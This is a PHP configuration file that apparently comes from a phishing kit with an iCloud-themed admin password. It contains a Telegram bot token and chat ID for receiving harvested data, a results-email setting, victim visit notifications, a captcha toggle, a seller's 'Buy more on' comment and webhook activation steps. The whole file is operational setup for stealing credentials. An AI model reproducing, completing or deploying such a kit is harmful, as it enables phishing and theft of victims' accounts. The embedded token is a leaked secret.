<?php 
ob_start();
session_start();
error_reporting(0);
//Is offline so captcha won't work
//Buy more on 
$adminpanel = 1;                   
$adminpass = "Icloud1";                   


$TGBO = trim('8736566745:AAGrqyVNjcnf6La-RufLzjiDOi_4sxAERkY');

$cID = trim('-4968513628');

//Your Email
$send = "email";
//Settings
$notification = '1'; // 1 to get new visit notification, 0 to off notification

//Enable captch
$captcha = 'on';


$newfold = 1;  // 0 > new folder for every new user and 1 > no new folder


$surl = 'https://ryih.digital/';


$lurl = 'ryih.digital/';

//open example.co/Admin/
// Enter the adminpass you set above
// On the homepage Click on activate Telegram
// wait for it to display Webhook is set
//You are set!
?>
